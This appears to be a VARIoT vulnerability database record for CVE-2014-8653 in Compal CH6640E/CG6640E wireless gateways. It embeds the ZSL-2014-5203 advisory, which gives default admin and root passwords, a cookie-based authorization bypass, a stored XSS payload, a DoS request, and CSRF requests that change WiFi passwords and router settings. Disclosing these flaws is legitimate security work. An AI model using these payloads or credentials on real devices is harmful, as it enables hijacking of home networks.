Denial of Service (DoS) for all WiFi connected clients (disconnect)
GET http://192.168.0.1/wirelessChannelStatus.html HTTP/1.1
Stored Cross-Site Scripting (XSS) Vulnerability
Cookie: userData Value: hax0r">alert(document.cookie);
--
document.cookie="hax0r">alert(document.cookie);; expires=Thu, 09 Dec 2014 11:05:00 UTC; domain=192.168.0.1; path=/";--
Cross-Site Request Forgery (CSRF) Vulnerability
DDNS config:
GET http://192.168.0.1/basicDDNS.html?DdnsService=1&DdnsUserName=a&DdnsPassword=b&DdnsHostName=c# HTTP/1.1
Change wifi pass:
GET http://192.168.0.1/setWirelessSecurity.html?Ssid=0&sMode=7&sbMode=1&encAlgm=3&psKey=NEW_PASSWORD&rekeyInt=0 HTTP/1.1
Add static mac address (static assigned dhcp client):
GET http://192.168.0.1/setBasicDHCP1.html?action=add_static&MacAddress=38%3A59%3AF9%3AC3%3AE3%3AEF&LeasedIP=8 HTTP/1.1
Enable/Disable UPnP:
GET http://192.168.0.1/setAdvancedOptions.html?action=apply&instance=undefined&UPnP=1 HTTP/1.1 (enable) GET http://192.168.0.1/setAdvancedOptions.html?action=apply&instance=undefined&UPnP=2 HTTP/1.1 (disable)
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201411-0176",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "cg6640e wireless gateway",
"scope": "eq",
"trust": 1.8,
"vendor": "compal broadband",
"version": "1.0"
},
{
"model": "",
"scope": "eq",
"trust": 1.6,
"vendor": "compal broadband",
"version": "ch6640-3.5.11.7-nosh"
},
{
"model": "ch664oe wireless gateway",
"scope": "eq",
"trust": 1.0,
"vendor": "compal broadband",
"version": "1.0"
},
{
"model": "ch6640e wireless gateway",
"scope": "eq",
"trust": 0.8,
"vendor": "compal broadband",
"version": "1.0"
},
{
"model": "networks",
"scope": "eq",
"trust": 0.8,
"vendor": "compal broadband",
"version": "ch6640-3.5.11.7-nosh"
},
{
"model": "broadband networks inc cg6640e wireless gateway",
"scope": "eq",
"trust": 0.6,
"vendor": "compal",
"version": "1.0"
},
{
"model": "broadband networks inc ch6640e wireless gateway",
"scope": "eq",
"trust": 0.6,
"vendor": "compal",
"version": "1.0"
},
{
"model": "broadband networks ch6640-3.5.11.7-nosh",
"scope": null,
"trust": 0.3,
"vendor": "compal",
"version": null
},
{
"model": "broadband networks ch664oe wireless gateway",
"scope": "eq",
"trust": 0.3,
"vendor": "compal",
"version": "1.0"
},
{
"model": "broadband networks cg6640e wireless gateway",
"scope": "eq",
"trust": 0.3,
"vendor": "compal",
"version": "1.0"
},
{
"model": "ch",
"scope": "eq",
"trust": 0.1,
"vendor": "compal broadband cbn",
"version": "model: ch6640 and ch6640e"
},
{
"model": "ch",
"scope": "eq",
"trust": 0.1,
"vendor": "compal broadband cbn",
"version": "hardware version: 1.0"
},
{
"model": "ch",
"scope": "eq",
"trust": 0.1,
"vendor": "compal broadband cbn",
"version": "firmware version: ch6640-3.5.11.7-nosh"
},
{
"model": "ch",
"scope": "eq",
"trust": 0.1,
"vendor": "compal broadband cbn",
"version": "boot version: pspu-boot(bbu) 1.0.19.25m1-cbn01"
},
{
"model": "ch",
"scope": "eq",
"trust": 0.1,
"vendor": "compal broadband cbn",
"version": "docsis mode: docsis 3.0"
}
],
"sources": [
{
"db": "ZSL",
"id": "ZSL-2014-5203"
},
{
"db": "CNVD",
"id": "CNVD-2014-07893"
},
{
"db": "BID",
"id": "80057"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-005240"
},
{
"db": "CNNVD",
"id": "CNNVD-201410-1374"
},
{
"db": "NVD",
"id": "CVE-2014-8653"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"cpe_match": [
{
"cpe22Uri": "cpe:/h:compal_broadband_networks:cg6640e_wireless_gateway",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/h:compal_broadband_networks:ch664oe_wireless_gateway",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/a:compal_broadband_networks:firmware",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2014-005240"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "LiquidWorm",
"sources": [
{
"db": "PACKETSTORM",
"id": "128860"
},
{
"db": "CNNVD",
"id": "CNNVD-201410-1374"
}
],
"trust": 0.7
},
"cve": "CVE-2014-8653",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"exploitabilityScore": 8.6,
"id": "CVE-2014-8653",
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 1.9,
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "CNVD-2014-07893",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "HIGH",
"trust": 0.6,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"exploitabilityScore": 8.6,
"id": "VHN-76598",
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 0.1,
"vectorString": "AV:N/AC:M/AU:N/C:N/I:P/A:N",
"version": "2.0"
}
],
"cvssV3": [],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2014-8653",
"trust": 1.0,
"value": "MEDIUM"
},
{
"author": "NVD",
"id": "CVE-2014-8653",
"trust": 0.8,
"value": "Medium"
},
{
"author": "CNVD",
"id": "CNVD-2014-07893",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-201410-1374",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "ZSL",
"id": "ZSL-2014-5203",
"trust": 0.1,
"value": "(3/5)"
},
{
"author": "VULHUB",
"id": "VHN-76598",
"trust": 0.1,
"value": "MEDIUM"
},
{
"author": "VULMON",
"id": "CVE-2014-8653",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "ZSL",
"id": "ZSL-2014-5203"
},
{
"db": "CNVD",
"id": "CNVD-2014-07893"
},
{
"db": "VULHUB",
"id": "VHN-76598"
},
{
"db": "VULMON",
"id": "CVE-2014-8653"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-005240"
},
{
"db": "CNNVD",
"id": "CNNVD-201410-1374"
},
{
"db": "NVD",
"id": "CVE-2014-8653"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Cross-site scripting (XSS) vulnerability in Compal Broadband Networks (CBN) CH6640E and CG6640E Wireless Gateway 1.0 with firmware CH6640-3.5.11.7-NOSH allows remote attackers to inject arbitrary web script or HTML via the userData cookie. The CBN CH6640E and CG6640E are wireless gateway devices. CBN CH6640E and CG6640E have multiple security vulnerabilities that allow an attacker to exploit vulnerabilities to bypass authorized access to sensitive information, perform cross-site scripting, cross-site request forgery, and denial of service attacks. Firmware is prone to a cross-site scripting vulnerability. \nProduct web page: http://www.icbn.com.tw\nAffected version: Model: CH6640 and CH6640E\n Hardware version: 1.0\n Firmware version: CH6640-3.5.11.7-NOSH\n Boot version: PSPU-Boot(BBU) 1.0.19.25m1-CBN01\n DOCSIS mode: DOCSIS 3.0\n\n\nSummary: The CBN CH6640E/CG6640E Wireless Gateway is designed for your home,\nhome office, or small business/enterprise. It can be used in households with\none or more computers capable of wireless connectivity for remote access to\nthe wireless gateway. \n\nDefault credentials:\n\nadmin/admin - Allow access gateway pages\nroot/compalbn - Allow access gateway, provisioning pages and provide more\n configuration information. \n\nTested on: Compal Broadband Networks, Inc/Linux/2.6.39.3 UPnP/1.1 MiniUPnPd/1.7\n\n\nVulnerabilities discovered by Gjoko \u0027LiquidWorm\u0027 Krstic\n @zeroscience\n\n\nAdvisory ID: ZSL-2014-5203\nAdvisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2014-5203.php\n\n\n04.10.2014\n\n---\n\n\n\nAuthorization Bypass Information Disclosure Vulnerability\n#########################################################\n\nhttp://192.168.0.1/xml/CmgwWirelessSecurity.xml\nhttp://192.168.0.1/xml/DocsisConfigFile.xml\nhttp://192.168.0.1/xml/CmgwBasicSetup.xml\nhttp://192.168.0.1/basicDDNS.html\nhttp://192.168.0.1/basicLanUsers.html\nhttp://192.168.0.1:5000/rootDesc.xml\n\nSet cookie: userData to root or admin, reveals additional pages/info. \n\n--\n\u003chtml\u003e\n\u003cbody\u003e\n\u003cscript\u003e\ndocument.cookie=\"userData=root; expires=Thu, 09 Dec 2014 11:05:00 UTC; domain=192.168.0.1; path=/\";\n\u003c/script\u003e\n\u003c/body\u003e\n\u003c/html\u003e\n--\n\n\nDenial of Service (DoS) for all WiFi connected clients (disconnect)\n###################################################################\n\nGET http://192.168.0.1/wirelessChannelStatus.html HTTP/1.1\n\n\nStored Cross-Site Scripting (XSS) Vulnerability\n###############################################\n\nCookie: userData\nValue: hax0r\"\u003e\u003cscript\u003ealert(document.cookie);\u003c/script\u003e\n\n--\n\u003chtml\u003e\n\u003cbody\u003e\n\u003cscript\u003e\ndocument.cookie=\"hax0r\"\u003e\u003cscript\u003ealert(document.cookie);\u003c/script\u003e; expires=Thu, 09 Dec 2014 11:05:00 UTC; domain=192.168.0.1; path=/\";\n\u003c/script\u003e\n\u003c/body\u003e\n\u003c/html\u003e\n--\n\n\nCross-Site Request Forgery (CSRF) Vulnerability\n###############################################\n\nDDNS config:\n------------\n\nGET http://192.168.0.1/basicDDNS.html?DdnsService=1\u0026DdnsUserName=a\u0026DdnsPassword=b\u0026DdnsHostName=c# HTTP/1.1\n\n\nChange wifi pass:\n-----------------\n\nGET http://192.168.0.1/setWirelessSecurity.html?Ssid=0\u0026sMode=7\u0026sbMode=1\u0026encAlgm=3\u0026psKey=NEW_PASSWORD\u0026rekeyInt=0 HTTP/1.1\n\n\nAdd static mac address (static assigned dhcp client):\n-----------------------------------------------------\n\nGET http://192.168.0.1/setBasicDHCP1.html?action=add_static\u0026MacAddress=38%3A59%3AF9%3AC3%3AE3%3AEF\u0026LeasedIP=8 HTTP/1.1\n\n\nEnable/Disable UPnP:\n--------------------\n\nGET http://192.168.0.1/setAdvancedOptions.html?action=apply\u0026instance=undefined\u0026UPnP=1 HTTP/1.1 (enable)\nGET http://192.168.0.1/setAdvancedOptions.html?action=apply\u0026instance=undefined\u0026UPnP=2 HTTP/1.1 (disable)\n\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2014-8653"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-005240"
},
{
"db": "CNVD",
"id": "CNVD-2014-07893"
},
{
"db": "BID",
"id": "80057"
},
{
"db": "ZSL",
"id": "ZSL-2014-5203"
},
{
"db": "VULHUB",
"id": "VHN-76598"
},
{
"db": "VULMON",
"id": "CVE-2014-8653"
},
{
"db": "PACKETSTORM",
"id": "128860"
}
],
"trust": 2.79
},
"exploit_availability": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"reference": "https://www.zeroscience.mk/codes/cbn_mv.txt",
"trust": 0.1,
"type": "poc"
},
{
"reference": "https://www.scap.org.cn/vuln/vhn-76598",
"trust": 0.1,
"type": "unknown"
},
{
"reference": "https://vulmon.com/exploitdetails?qidtp=exploitdb\u0026qid=35075",
"trust": 0.1,
"type": "exploit"
}
],
"sources": [
{
"db": "ZSL",
"id": "ZSL-2014-5203"
},
{
"db": "VULHUB",
"id": "VHN-76598"
},
{
"db": "VULMON",
"id": "CVE-2014-8653"
}
]
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2014-8653",
"trust": 3.6
},
{
"db": "EXPLOIT-DB",
"id": "35075",
"trust": 3.0
},
{
"db": "BID",
"id": "70762",
"trust": 2.8
},
{
"db": "ZSL",
"id": "ZSL-2014-5203",
"trust": 2.6
},
{
"db": "PACKETSTORM",
"id": "128860",
"trust": 2.0
},
{
"db": "OSVDB",
"id": "113839",
"trust": 1.9
},
{
"db": "XF",
"id": "98328",
"trust": 1.0
},
{
"db": "JVNDB",
"id": "JVNDB-2014-005240",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201410-1374",
"trust": 0.7
},
{
"db": "CNVD",
"id": "CNVD-2014-07893",
"trust": 0.6
},
{
"db": "BID",
"id": "80057",
"trust": 0.5
},
{
"db": "XF",
"id": "98329",
"trust": 0.1
},
{
"db": "OSVDB",
"id": "113843",
"trust": 0.1
},
{
"db": "OSVDB",
"id": "113838",
"trust": 0.1
},
{
"db": "OSVDB",
"id": "113836",
"trust": 0.1
},
{
"db": "OSVDB",
"id": "113842",
"trust": 0.1
},
{
"db": "OSVDB",
"id": "113841",
"trust": 0.1
},
{
"db": "OSVDB",
"id": "113840",
"trust": 0.1
},
{
"db": "OSVDB",
"id": "113837",
"trust": 0.1
},
{
"db": "CXSECURITY",
"id": "WLB-2014100162",
"trust": 0.1
},
{
"db": "VULHUB",
"id": "VHN-76598",
"trust": 0.1
},
{
"db": "VULMON",
"id": "CVE-2014-8653",
"trust": 0.1
}
],
"sources": [
{
"db": "ZSL",
"id": "ZSL-2014-5203"
},
{
"db": "CNVD",
"id": "CNVD-2014-07893"
},
{
"db": "VULHUB",
"id": "VHN-76598"
},
{
"db": "VULMON",
"id": "CVE-2014-8653"
},
{
"db": "BID",
"id": "80057"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-005240"
},
{
"db": "PACKETSTORM",
"id": "128860"
},
{
"db": "CNNVD",
"id": "CNNVD-201410-1374"
},
{
"db": "NVD",
"id": "CVE-2014-8653"
}
]
},
"id": "VAR-201411-0176",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2014-07893"
},
{
"db": "VULHUB",
"id": "VHN-76598"
}
],
"trust": 1.7
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2014-07893"
}
]
},
"last_update_date": "2025-04-13T23:14:41.475000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Top Page",
"trust": 0.8,
"url": "http://www.icbn.com.tw/"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2014-005240"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-79",
"trust": 1.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-76598"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-005240"
},
{
"db": "NVD",
"id": "CVE-2014-8653"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.5,
"url": "http://www.zeroscience.mk/en/vulnerabilities/zsl-2014-5203.php"
},
{
"trust": 2.2,
"url": "http://www.securityfocus.com/bid/70762"
},
{
"trust": 2.1,
"url": "http://www.exploit-db.com/exploits/35075"
},
{
"trust": 1.9,
"url": "http://osvdb.org/show/osvdb/113839"
},
{
"trust": 1.8,
"url": "http://packetstormsecurity.com/files/128860/cbn-ch6640e-cg6640e-wireless-gateway-xss-csrf-dos-disclosure.html"
},
{
"trust": 1.2,
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/98328"
},
{
"trust": 1.0,
"url": "http://www.exploit-db.com/exploits/35075/"
},
{
"trust": 1.0,
"url": "http://xforce.iss.net/xforce/xfdb/98328"
},
{
"trust": 0.9,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2014-8653"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-8653"
},
{
"trust": 0.1,
"url": "http://cxsecurity.com/issue/wlb-2014100162"
},
{
"trust": 0.1,
"url": "http://osvdb.org/show/osvdb/113836"
},
{
"trust": 0.1,
"url": "http://osvdb.org/show/osvdb/113837"
},
{
"trust": 0.1,
"url": "http://osvdb.org/show/osvdb/113838"
},
{
"trust": 0.1,
"url": "http://osvdb.org/show/osvdb/113840"
},
{
"trust": 0.1,
"url": "http://osvdb.org/show/osvdb/113841"
},
{
"trust": 0.1,
"url": "http://osvdb.org/show/osvdb/113842"
},
{
"trust": 0.1,
"url": "http://osvdb.org/show/osvdb/113843"
},
{
"trust": 0.1,
"url": "http://packetstormsecurity.com/files/128860"
},
{
"trust": 0.1,
"url": "http://xforce.iss.net/xforce/xfdb/98329"
},
{
"trust": 0.1,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=2014-8653"
},
{
"trust": 0.1,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=2014-8654"
},
{
"trust": 0.1,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=2014-8655"
},
{
"trust": 0.1,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=2014-8656"
},
{
"trust": 0.1,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=2014-8657"
},
{
"trust": 0.1,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2014-8654"
},
{
"trust": 0.1,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2014-8655"
},
{
"trust": 0.1,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2014-8656"
},
{
"trust": 0.1,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2014-8657"
},
{
"trust": 0.1,
"url": "https://cwe.mitre.org/data/definitions/79.html"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov"
},
{
"trust": 0.1,
"url": "https://www.securityfocus.com/bid/80057"
},
{
"trust": 0.1,
"url": "http://192.168.0.1/basiclanusers.html"
},
{
"trust": 0.1,
"url": "http://192.168.0.1/xml/docsisconfigfile.xml"
},
{
"trust": 0.1,
"url": "http://192.168.0.1/xml/cmgwbasicsetup.xml"
},
{
"trust": 0.1,
"url": "http://192.168.0.1/setwirelesssecurity.html?ssid=0\u0026smode=7\u0026sbmode=1\u0026encalgm=3\u0026pskey=new_password\u0026rekeyint=0"
},
{
"trust": 0.1,
"url": "http://192.168.0.1:5000/rootdesc.xml"
},
{
"trust": 0.1,
"url": "http://192.168.0.1/basicddns.html"
},
{
"trust": 0.1,
"url": "http://192.168.0.1/setadvancedoptions.html?action=apply\u0026instance=undefined\u0026upnp=1"
},
{
"trust": 0.1,
"url": "http://192.168.0.1/xml/cmgwwirelesssecurity.xml"
},
{
"trust": 0.1,
"url": "http://192.168.0.1/wirelesschannelstatus.html"
},
{
"trust": 0.1,
"url": "http://192.168.0.1/setbasicdhcp1.html?action=add_static\u0026macaddress=38%3a59%3af9%3ac3%3ae3%3aef\u0026leasedip=8"
},
{
"trust": 0.1,
"url": "http://www.icbn.com.tw"
},
{
"trust": 0.1,
"url": "http://192.168.0.1/basicddns.html?ddnsservice=1\u0026ddnsusername=a\u0026ddnspassword=b\u0026ddnshostname=c#"
},
{
"trust": 0.1,
"url": "http://192.168.0.1/setadvancedoptions.html?action=apply\u0026instance=undefined\u0026upnp=2"
}
],
"sources": [
{
"db": "ZSL",
"id": "ZSL-2014-5203"
},
{
"db": "CNVD",
"id": "CNVD-2014-07893"
},
{
"db": "VULHUB",
"id": "VHN-76598"
},
{
"db": "VULMON",
"id": "CVE-2014-8653"
},
{
"db": "BID",
"id": "80057"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-005240"
},
{
"db": "PACKETSTORM",
"id": "128860"
},
{
"db": "CNNVD",
"id": "CNNVD-201410-1374"
},
{
"db": "NVD",
"id": "CVE-2014-8653"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "ZSL",
"id": "ZSL-2014-5203"
},
{
"db": "CNVD",
"id": "CNVD-2014-07893"
},
{
"db": "VULHUB",
"id": "VHN-76598"
},
{
"db": "VULMON",
"id": "CVE-2014-8653"
},
{
"db": "BID",
"id": "80057"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-005240"
},
{
"db": "PACKETSTORM",
"id": "128860"
},
{
"db": "CNNVD",
"id": "CNNVD-201410-1374"
},
{
"db": "NVD",
"id": "CVE-2014-8653"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2014-10-25T00:00:00",
"db": "ZSL",
"id": "ZSL-2014-5203"
},
{
"date": "2014-11-04T00:00:00",
"db": "CNVD",
"id": "CNVD-2014-07893"
},
{
"date": "2014-11-06T00:00:00",
"db": "VULHUB",
"id": "VHN-76598"
},
{
"date": "2014-11-06T00:00:00",
"db": "VULMON",
"id": "CVE-2014-8653"
},
{
"date": "2014-11-06T00:00:00",
"db": "BID",
"id": "80057"
},
{
"date": "2014-11-07T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2014-005240"
},
{
"date": "2014-10-28T00:59:24",
"db": "PACKETSTORM",
"id": "128860"
},
{
"date": "2014-10-29T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201410-1374"
},
{
"date": "2014-11-06T15:55:10.757000",
"db": "NVD",
"id": "CVE-2014-8653"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2014-11-07T00:00:00",
"db": "ZSL",
"id": "ZSL-2014-5203"
},
{
"date": "2014-11-10T00:00:00",
"db": "CNVD",
"id": "CNVD-2014-07893"
},
{
"date": "2017-09-08T00:00:00",
"db": "VULHUB",
"id": "VHN-76598"
},
{
"date": "2017-09-08T00:00:00",
"db": "VULMON",
"id": "CVE-2014-8653"
},
{
"date": "2014-11-06T00:00:00",
"db": "BID",
"id": "80057"
},
{
"date": "2014-11-07T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2014-005240"
},
{
"date": "2014-11-13T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201410-1374"
},
{
"date": "2025-04-12T10:46:40.837000",
"db": "NVD",
"id": "CVE-2014-8653"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201410-1374"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Compal Broadband Networks of CH6640E and CG6640E Wireless Gateway Firmware cross-site scripting vulnerability",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2014-005240"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "XSS",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201410-1374"
}
],
"trust": 0.6
}
}
VAR-201411-0179
Vulnerability from variot - Updated: 2025-04-13 23:14The Compal Broadband Networks (CBN) CH6640E and CG6640E Wireless Gateway 1.0 with firmware CH6640-3.5.11.7-NOSH have a default password of (1) admin for the admin account and (2) compalbn for the root account, which makes it easier for remote attackers to obtain access to certain sensitive information via unspecified vectors. The CBN CH6640E and CG6640E are wireless gateway devices. CBN CH6640E and CG6640E have multiple security vulnerabilities that allow an attacker to exploit vulnerabilities to bypass authorized access to sensitive information, perform cross-site scripting, cross-site request forgery, and denial of service attacks. Multiple information-disclosure vulnerabilities 2. A denial-of-service vulnerability 3. An HTML-injection vulnerability 4. Other attacks are also possible. A remote attacker could exploit this vulnerability to gain access to sensitive information. Product web page: http://www.icbn.com.tw Affected version: Model: CH6640 and CH6640E Hardware version: 1.0 Firmware version: CH6640-3.5.11.7-NOSH Boot version: PSPU-Boot(BBU) 1.0.19.25m1-CBN01 DOCSIS mode: DOCSIS 3.0
Summary: The CBN CH6640E/CG6640E Wireless Gateway is designed for your home, home office, or small business/enterprise. It can be used in households with one or more computers capable of wireless connectivity for remote access to the wireless gateway.
Default credentials:
admin/admin - Allow access gateway pages root/compalbn - Allow access gateway, provisioning pages and provide more configuration information.
Tested on: Compal Broadband Networks, Inc/Linux/2.6.39.3 UPnP/1.1 MiniUPnPd/1.7
Vulnerabilities discovered by Gjoko 'LiquidWorm' Krstic @zeroscience
Advisory ID: ZSL-2014-5203 Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2014-5203.php
04.10.2014
Authorization Bypass Information Disclosure Vulnerability
http://192.168.0.1/xml/CmgwWirelessSecurity.xml http://192.168.0.1/xml/DocsisConfigFile.xml http://192.168.0.1/xml/CmgwBasicSetup.xml http://192.168.0.1/basicDDNS.html http://192.168.0.1/basicLanUsers.html http://192.168.0.1:5000/rootDesc.xml
Set cookie: userData to root or admin, reveals additional pages/info.
--
document.cookie="userData=root; expires=Thu, 09 Dec 2014 11:05:00 UTC; domain=192.168.0.1; path=/";--
Denial of Service (DoS) for all WiFi connected clients (disconnect)
